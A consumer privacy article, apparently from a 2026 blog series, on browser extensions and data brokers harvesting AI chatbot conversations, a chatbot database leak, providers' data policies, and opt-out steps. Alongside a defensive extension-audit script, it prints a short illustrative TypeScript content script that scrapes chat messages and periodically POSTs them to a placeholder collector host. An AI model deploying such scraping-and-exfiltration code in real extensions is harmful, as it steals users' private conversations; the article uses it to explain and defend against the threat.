Your AI Chats Are Being Sold: Browser Extensions, Data Brokers, and the March 2026 Privacy Audit

Browser extensions are harvesting ChatGPT and Claude conversations for sale. Here's what's happening and how to protect yourself.


The browser extension you installed to “improve your AI experience” might be selling your conversations to data brokers. A wave of discoveries in early 2026 has exposed a disturbing pattern: millions of AI chatbot users are having their private conversations harvested, packaged, and sold without meaningful consent.

The 900,000-User Heist

In January 2026, security researchers at OX Security uncovered a malware campaign that had stolen ChatGPT and DeepSeek conversations from nearly 900,000 Chrome users. The campaign, dubbed “Prompt Poaching,” operated through extensions that impersonated a legitimate AI assistant tool called AITOPIA.

The malicious extensions requested consent for “anonymous, non-identifiable analytics data” while actually exfiltrating complete conversation content: every prompt and every response, sent to remote servers in batches every 30 minutes.
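To see how little code this kind of theft requires, here’s a deliberately simplified TypeScript sketch of what a content script with page access can do. The message selector and the collection endpoint below are hypothetical placeholders for illustration, not artifacts from the actual campaign.

```typescript
// Deliberately simplified illustration -- NOT the actual malware.
// A content script granted access to a chat page can read the rendered
// conversation straight out of the DOM and send it anywhere.

function scrapeConversation(): string {
  // Hypothetical selector for message bubbles on the chat page.
  const messages = document.querySelectorAll("[data-message-id]");
  return Array.from(messages)
    .map((el) => (el as HTMLElement).innerText)
    .join("\n---\n");
}

// Exfiltrate on a timer, mirroring the reported 30-minute cadence.
// The endpoint is a made-up placeholder.
setInterval(() => {
  void fetch("https://collector.example.com/ingest", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ chat: scrapeConversation() }),
  });
}, 30 * 60 * 1000);
```

Any extension granted access to the chat page can run logic like this, and the browser has no way to distinguish it from legitimate functionality. That’s the entire trick.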

Microsoft’s Defender Security Research Team later confirmed the attack affected more than 20,000 enterprise tenants. That means corporate secrets, proprietary code, and confidential business discussions were compromised alongside personal conversations.

The Data Broker Pipeline

But outright malware isn’t the only threat. According to Futurism, a seemingly legitimate VPN extension called Urban VPN Proxy—with 6 million users—has been harvesting AI conversations and selling them through its affiliated data broker, BiScience.

The extension’s “executor” scripts intercept conversations from ChatGPT, Claude, Gemini, DeepSeek, and Grok regardless of whether the VPN is active. There’s no toggle to disable it. The data collection started around July 2025, and the privacy policy—buried in legalese—admits the company “shares Web Browsing Data” with BiScience for “marketing analytics.”

What gets harvested? According to security researchers: medical questions, financial details, proprietary code, and personal dilemmas. All searchable. All for sale.

The Sears Chatbot Disaster

Even if you’ve never installed a suspicious extension, your AI conversations may be exposed through the services you use.

Security researcher Jeremiah Fowler discovered three unprotected databases containing 3.7 million records from Sears Home Services’ AI chatbot “Samantha.” The exposed data included:

  • 2.1 million chat transcripts
  • 1.4 million audio recordings (3.9TB total)
  • Customer names, addresses, phone numbers, and appointment details
  • Recordings spanning 2024 to 2026

Some audio files captured up to 4 hours of continuous recording, including conversations completely unrelated to the customer service call. The databases were accessible to anyone with a web browser—no password, no encryption.

The privacy implications extend beyond identity theft. Those 1.4 million voice recordings represent raw material for voice cloning attacks. Criminals need as little as 30 seconds of audio to create convincing deepfakes; these databases offered hours per customer.

What the AI Companies Actually Do With Your Data

Beyond third-party threats, the chatbot providers themselves have varying—and recently changed—policies on data use.

ChatGPT (OpenAI)

ChatGPT uses your conversations for training by default on Free, Plus, and Pro plans. You can opt out through Settings > Data Controls. The Temporary Chat feature excludes conversations from training and history, though OpenAI may still retain them for up to 30 days for safety monitoring.

Business accounts (Team, Enterprise, API) are excluded from training by default.

Claude (Anthropic)

Anthropic changed its policy in September 2025. Previously, Claude didn’t use consumer conversations for training by default. Under the new policy, users on Free, Pro, and Max plans were asked to choose, with a deadline of October 8, 2025. Opt in, and Anthropic can retain your data for up to five years; opt out, and retention stays at 30 days.

Previous conversations shared before opting out may already be in training datasets.

Gemini (Google)

Google retains Gemini conversations for 18 months by default, adjustable to 3 or 36 months. Human reviewers may examine your conversations. The “Personal Intelligence” dashboard introduced in early 2026 groups Gmail and cross-app access permissions together.

You can disable training and human review at myaccount.google.com > Data and Privacy > Gemini Apps Activity.

Copilot (Microsoft)

Microsoft takes a stronger stance, at least for business users: Copilot for Microsoft 365 doesn’t use customer data to train foundation models, and prompts and responses stay within the Microsoft 365 service boundary under enterprise data protection.

Grok (xAI)

Grok’s privacy policy is notably less restrictive. If you use Grok without logging in, you grant xAI “full rights to use any data you provide” for model training. The UK’s Information Commissioner’s Office has opened a formal investigation into xAI’s data practices.

How to Protect Yourself

Audit Your Browser Extensions

  1. Open Chrome’s extension manager (chrome://extensions)
  2. Review each extension’s permissions: anything with “Read and change all your data on all websites” can intercept AI chats (a script that automates this check appears after this list)
  3. Remove extensions you don’t actively use
  4. Check the extensions you keep against published lists of known-malicious extension IDs from security vendors
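If you’d rather not click through each extension by hand, the sketch below automates step 2 by scanning installed extension manifests for broad host permissions. It’s a minimal example that assumes a default Chrome profile on macOS or Linux; adjust EXT_DIR for Windows or non-default profiles, and run it with a TypeScript runner such as tsx.

```typescript
// audit-extensions.ts -- flag Chrome extensions whose host permissions
// let them read every page you visit, including AI chat pages.
import { promises as fs } from "fs";
import * as path from "path";
import * as os from "os";

// Default Chrome profile locations (assumption: macOS or Linux).
const EXT_DIR =
  process.platform === "darwin"
    ? path.join(os.homedir(), "Library/Application Support/Google/Chrome/Default/Extensions")
    : path.join(os.homedir(), ".config/google-chrome/Default/Extensions");

// Permission patterns that grant access to arbitrary sites.
const BROAD = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

async function main() {
  for (const id of await fs.readdir(EXT_DIR)) {
    try {
      const versions = await fs.readdir(path.join(EXT_DIR, id));
      const raw = await fs.readFile(path.join(EXT_DIR, id, versions[0], "manifest.json"), "utf8");
      const manifest = JSON.parse(raw);
      const perms: string[] = [
        ...(manifest.permissions ?? []),
        ...(manifest.host_permissions ?? []),
        ...(manifest.content_scripts ?? []).flatMap((cs: any) => cs.matches ?? []),
      ];
      if (perms.some((p) => BROAD.includes(p))) {
        // Note: some names are i18n placeholders like __MSG_appName__.
        console.log(`FLAG ${manifest.name ?? id}: ${perms.join(", ")}`);
      }
    } catch {
      // Skip non-extension entries and unreadable manifests.
    }
  }
}

main();
```

A flag doesn’t mean an extension is malicious; password managers and ad blockers legitimately need broad access. But the flagged entries are the ones worth scrutinizing and, if unused, removing.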

The Prompt Poaching extensions have been removed from Chrome Web Store, but copycat malware continues to appear.

Opt Out Where Possible

ChatGPT: Settings > Data Controls > toggle off “Improve the model for everyone”

Claude: Settings > Privacy > turn off “Help improve Claude”

Gemini: myaccount.google.com > Data and Privacy > Gemini Apps Activity > Turn off

Grok: Log in before using (anonymous use grants full data rights)

Use Privacy-Preserving Features

  • ChatGPT’s Temporary Chat: Conversations aren’t saved to history or used for training
  • Claude’s training opt-out: Opted-out conversations aren’t used for training and are retained for only 30 days
  • Incognito/private browsing: Doesn’t prevent the service itself from collecting data; it blocks extensions only because Chrome disables them in incognito by default, and any extension you’ve explicitly allowed in incognito can still read your chats

Don’t Share Sensitive Information

Regardless of privacy settings, avoid sharing:

  • Personal identifying information (names, addresses, birthdates)
  • Medical records or health concerns
  • Financial account numbers
  • Proprietary business code
  • Passwords or credentials

If you must discuss sensitive topics, use generic terms or hypotheticals.

Consider Local AI

For maximum privacy, local models like Llama, Mistral, or Qwen running on your own hardware never send data anywhere. Tools like Ollama make this increasingly practical for everyday use.
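As a minimal sketch of what that looks like in practice, here’s a TypeScript snippet that talks to Ollama’s local REST API. It assumes Ollama is running and that you’ve pulled a model, e.g. with `ollama pull llama3`.

```typescript
// chat-local.ts -- send a prompt to a locally running Ollama server.
// Nothing here leaves your machine: the request goes to localhost only.

async function askLocal(prompt: string): Promise<string> {
  const res = await fetch("http://localhost:11434/api/chat", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      model: "llama3", // assumption: this model has been pulled locally
      messages: [{ role: "user", content: prompt }],
      stream: false, // return one JSON object instead of a token stream
    }),
  });
  const data = await res.json();
  return data.message.content;
}

askLocal("Summarize the privacy risks of browser extensions.").then(console.log);
```

Because the request never leaves localhost, there’s no provider retention policy, training opt-out, or extension in the middle to worry about.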

What This Means

The AI privacy landscape in March 2026 is a minefield. Browser extensions silently harvest conversations. Data brokers package and sell your prompts. Corporate chatbot implementations leak millions of records. And even the “legitimate” providers have policies that most users have never read.

The default assumption should be that anything you type into an AI chatbot could become public. Until that changes—through regulation, enforcement, or a fundamental shift in how these services operate—treat every conversation accordingly.


This article is part of Intelligibberish’s ongoing AI privacy audit series. For the full audit from March 19, 2026, see our comprehensive opt-out guide.